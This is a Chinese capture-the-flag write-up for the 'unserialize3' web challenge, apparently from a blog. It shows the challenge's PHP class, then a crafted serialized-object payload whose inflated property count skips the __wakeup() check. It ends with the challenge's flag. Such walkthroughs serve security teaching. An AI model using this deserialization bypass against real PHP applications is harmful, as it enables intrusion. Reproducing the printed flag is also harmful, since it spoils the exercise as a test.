攻防世界WEB进阶之unserialize3

本文介绍了一道关于PHP序列化与反序列化的攻防题目,通过分析和实操,揭示了如何利用__wakeup()方法绕过过滤,最终获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界WEB进阶之unserialize3


难度系数: 1星
题目来源: 暂无
题目描述:暂无

第一步:分析

题目仅仅给出了一个场景打开场景看到了如下内容:
class xctf{
public $flag = ‘111’;
public function __wakeup(){
exit(‘bad requests’);
}
?code=
通过分析在浏览器地址框输入:地址 + /?code=0,发现0出现在code后面。

第二步:实操

所以我们输入的字段会直接传到code中。
根据题给的信息unserialize,序列化操作我们联想到序列化函数:serialize($a);
通过如下编程构造:

<?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $a = new xctf(); $s = serialize($a); echo $s; ?>

结果输出为:O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}
心中窃喜,输入得到的结果是:bad request。悲愤中。
通过查资料了解到:
__wakeup():unserialize() 时会自动调用我们在反序列化的时候 可能有时候__wakeup 中会进行一些过滤等等的操作 所以我们需要尝试绕过
绕过的条件:反序列化中object的个数和之前的个数不等。
那么刚刚序列化出来的数据的object个数表示在哪呢?如下:
O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}再来一次,露出了窃喜的笑容,成功获得。

第三步:答案

至此flag为:cyberpeace{57a03e230882a19dc9e672a8d351eff2}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值